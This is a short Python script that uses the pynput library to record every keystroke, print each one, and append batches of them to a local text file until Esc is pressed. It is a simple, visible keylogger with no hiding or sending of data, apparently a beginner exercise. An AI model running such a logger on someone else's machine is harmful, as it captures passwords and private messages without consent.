from pynput.keyboard import Key, Listener

count = 0
keys = []


def on_press(key):
    global keys, count

    keys.append(key)
    count += 1
    print('the key is:', key)

    if count >= 10:
        count = 0
        wrihte_file(keys)
        keys = []


def wrihte_file(keys):
    with open('ameen.text', 'a') as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)


def on_release(key):
    if key == Key.esc:
        return False


with Listener(on_press= on_press, on_release= on_release) as listener:
    listener.join()